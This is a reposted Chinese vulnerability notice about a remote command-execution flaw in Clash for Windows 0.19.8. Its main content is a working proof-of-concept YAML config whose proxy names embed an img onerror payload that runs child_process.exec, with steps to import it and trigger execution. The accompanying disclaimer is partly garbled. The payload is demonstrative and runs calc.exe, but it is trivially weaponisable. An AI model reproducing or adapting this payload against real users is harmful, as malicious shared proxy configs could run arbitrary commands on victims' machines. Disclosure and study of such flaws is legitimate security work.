漏洞通告:Clash命令执行,附复现环境以及POC下载链接

渗透技巧 3年前 (2022) admin
893 0 0

 

0x01

漏洞描述

 

Clash:一个 Go 语言开发的多平台代理客户端

 

0x02

漏洞状态

 

漏洞细节

漏洞POC

漏洞EXP

在野利用

公开

未知

未知

 

 

0x03

影响范围

 

目前已知版本0.19.8受其影响,其他版本未进行测试

 

0x04

漏洞复现

 

复现环境下载地址

https://github.com/Fndroid/clash_for_windows_pkg/releases

漏洞poc地址

https://github.com/Fndroid/clash_for_windows_pkg/issues/2710

根据自己计算机系统下载相应的版本,建议下载0.19.8版本

漏洞通告:Clash命令执行,附复现环境以及POC下载链接

poc

port: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies:  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>    type: socks5    server: 127.0.0.1    port: "17938"    skip-cert-verify: true  - name: abc    type: socks5    server: 127.0.0.1    port: "8088"    skip-cert-verify: true
proxy-groups:  -    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>    type: select    proxies:    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

新建一任意txt将文本写进去后将文件后缀改为.yaml即可

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
– name: a<img/src=”1″/onerror=eval(`require(“child_process”).exec(“calc.exe”);`);>
type: socks5
server: 127.0.0.1
port: “17938”
skip-cert-verify: true
– name: abc
type: socks5
server: 127.0.0.1
port: “8088”
skip-cert-verify: true

proxy-groups:

name: <img/src=”1″/onerror=eval(`require(“child_process”).exec(“calc.exe”);`);>
type: select
proxies:
– a<img/src=”1″/onerror=eval(`require(“child_process”).exec(“calc.exe”);`);>

新建一任意txt将文本写进去后将文件后缀改为.yaml即可

 

漏洞通告:Clash命令执行,附复现环境以及POC下载链接

导入poc文件,直接拖入或者选择导入都可以

 

漏洞通告:Clash命令执行,附复现环境以及POC下载链接

运行

 

漏洞通告:Clash命令执行,附复现环境以及POC下载链接

命令执行成功漏洞通告:Clash命令执行,附复现环境以及POC下载链接

 

0x05

修复建议

 

升级版本

 

0x06

复现环境

 

后台回复20220226获取复现环境下载链接

 

0x07

声明

 

漏洞通告:Clash命令执行,附复现环境以及POC下载链接

 

本文最终解释权归本文作者所有!

    任何公众号场、本项目涉及的任何工具,仅用于商业商业用途,不能保证其合法性和使用性,并能用于研究项目中的应用,目标和有效的实施情况自己判断;

     文章、项目内场所有资源文件,杜绝任何靶本公众号、自媒体进行形式的擅自转载、发布

    公众对脚本及任何概不负责包括不由任何脚本错误导致的工具损失或损害及任何法律责任;

    直接使用本或公众发布的技术、靶场文章项目中涉及的脚本工具,但在某些行为不符合任何国家/地区或相关地区的情况下进行传播时,引发的隐私或其他任何法律问题的后果概不负责;

    如果任何单位或个人认为项目或文章的内容可能侵犯其权利,则应及时通知并证明其身份,证明我们将在收到证明文件后删除相关内容;

    以方式或使用此项目的任何人或直接使用项目的直接用户都应仔细阅读此声明;

    本公众号保留更改或补充,免责随时声明的权利;

    访问本公众号的任何文章或项目,请您立即接受此免责声明。

您在本声明未发出之时,或者使用访问已接受此声明,请查看本公众号。

                                                                                              此致

    由于、利用的信息而造成的任何或直接的此文传播后果,均由用户本人负责,作者不承担任何直接责任。

一切法律后果均由攻击者承担!!!

日站不规范,亲人两行泪!!!

不规范,亲人两行!!!

不规范,亲人两行!!!

  • 专注于信息安全方面分享,传播商业性广告,不

  • 关注不迷,点赞!关注!转向!评论!!

  • 要投稿的请留言或者加微信,会第一时间回复,谢谢!

 

 

 

 

 

原文始发于微信公众号(每天一个入狱小技巧):漏洞通告:Clash命令执行,附复现环境以及POC下载链接

版权声明:admin 发表于 2022年2月26日 上午2:14。
转载请注明:漏洞通告:Clash命令执行,附复现环境以及POC下载链接 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...